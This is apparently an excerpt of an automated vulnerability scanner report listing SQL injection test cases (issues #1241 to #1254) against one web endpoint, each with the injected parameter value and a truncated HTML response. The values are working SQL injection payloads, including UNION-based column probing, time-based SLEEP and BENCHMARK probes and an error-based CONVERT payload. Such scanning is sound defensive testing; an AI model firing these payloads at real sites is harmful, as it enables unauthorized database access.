1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1241\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/cdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1242\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AND 7506=9091 AND ('5913=\n5913\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1243\nScan SQL Injection\nSeverity ERROREndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 1,2-\n-\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1244\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16,17,18#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/z8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1245\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT \n1,2,3,4,5,6,7#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1246\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1247\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 20--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89Issue Number #1248\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AND false\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1249\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT \n1,2,3,4#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"ze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1250\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# '%20and%201=2%20--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1251\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1Test Step GET\nModified \nParametersName Value\nDemoUser1# AND 5650=CONVERT(INT,(SELECT CHAR(113)+CHAR(106)+\nCHAR(122)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (\n5650=5650) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113\n)+CHAR(112)+CHAR(106)+CHAR(107)+CHAR(113)))\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1252\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')\n)\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/z8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1253\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1254\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# sleep(5)#ResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script 